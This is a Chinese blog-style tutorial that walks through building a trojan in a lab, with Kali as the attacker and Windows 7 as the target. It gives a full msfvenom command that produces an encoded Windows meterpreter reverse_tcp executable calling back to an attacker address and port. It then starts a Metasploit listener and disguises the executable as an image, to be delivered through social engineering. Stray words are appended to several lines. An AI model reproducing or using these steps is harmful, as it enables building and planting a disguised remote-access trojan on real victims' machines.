漏洞复现:使用Kali制做木马程序

漏洞复现:使用Kali制做木马程序windows

 

 

攻击机:Kali2019tcp

靶机:Win7 64位spa

 

 

攻击步骤:3d

1.打开Kali2019和Win7 64位虚拟机,肯定IP地址在一个网段blog

 

 2.肯定好IP地址,进入Kali2019进行木马文件.exe制做,命令以下图片

命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe虚拟机

 

 备注:咱们选择的靶机是Win7 64位,因此兼容性必定要设置好,不然会出错it

3.接下来打开msf,编辑远程模块,设置payload,具体流程看图io

 

 

 4.开始设置Payload信息,输入show options查看,lhost和lport都要设置成exe文件中设置的地址和端口号兼容性

 

 5.输入exploit开始运行监听模块,开始监听

 

 6.把刚刚生成的pink程序经过压缩合并,制做一个图片exe文件,经过社工或者其余方法上传到win7 64位虚拟机中

 

 7.运行这个文件,图片会打开,Kali2019会收到链接成功的提示

 

 

 

 

 

 8.成功获取win7权限,渗透成功

相关文章
相关标签/搜索